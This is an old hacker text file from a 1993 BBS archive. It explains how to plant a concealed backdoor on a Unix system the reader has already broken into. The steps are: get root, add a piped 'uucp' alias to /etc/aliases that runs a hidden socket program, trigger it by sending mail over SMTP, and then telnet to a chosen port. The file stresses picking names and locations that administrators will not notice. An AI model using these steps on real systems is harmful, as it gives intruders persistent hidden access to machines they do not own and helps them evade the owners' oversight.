home *** CD-ROM | disk | FTP | other *** search
/ Phoenix Rising BBS / phoenixrising.zip / phoenixrising / unix / sock.arj / SOCK.TXT < prev   
Text File  |  1993-05-13  |  588b  |  17 lines

  1. How this works: 
  2.  
  3. 1) Get root :)
  4. 2) Install the following line in /etc/aliases.  Use whatever alias you
  5. want; I find uucp is often unaliased & inconspicuous.  Put the full
  6. path to where you plan to put the socket prog in place of /proggy.
  7.  
  8. uucp: "|/proggy"
  9.  
  10. 3) Compile sock.c & put somewhere inconspicuous.
  11. 4) Mail your alias with a dummy message; an example is given below.
  12.  
  13. telnet hacked.stupid.edu 25;  mail from: <me>; rcpt to: <uucp>; data; hey
  14.  
  15. 5) Program is installed.  Telnet to chosen port on your host, ie:
  16. telnet hacked.stupid.edu xxxx (where xxxx is replaced by chosen port).
  17.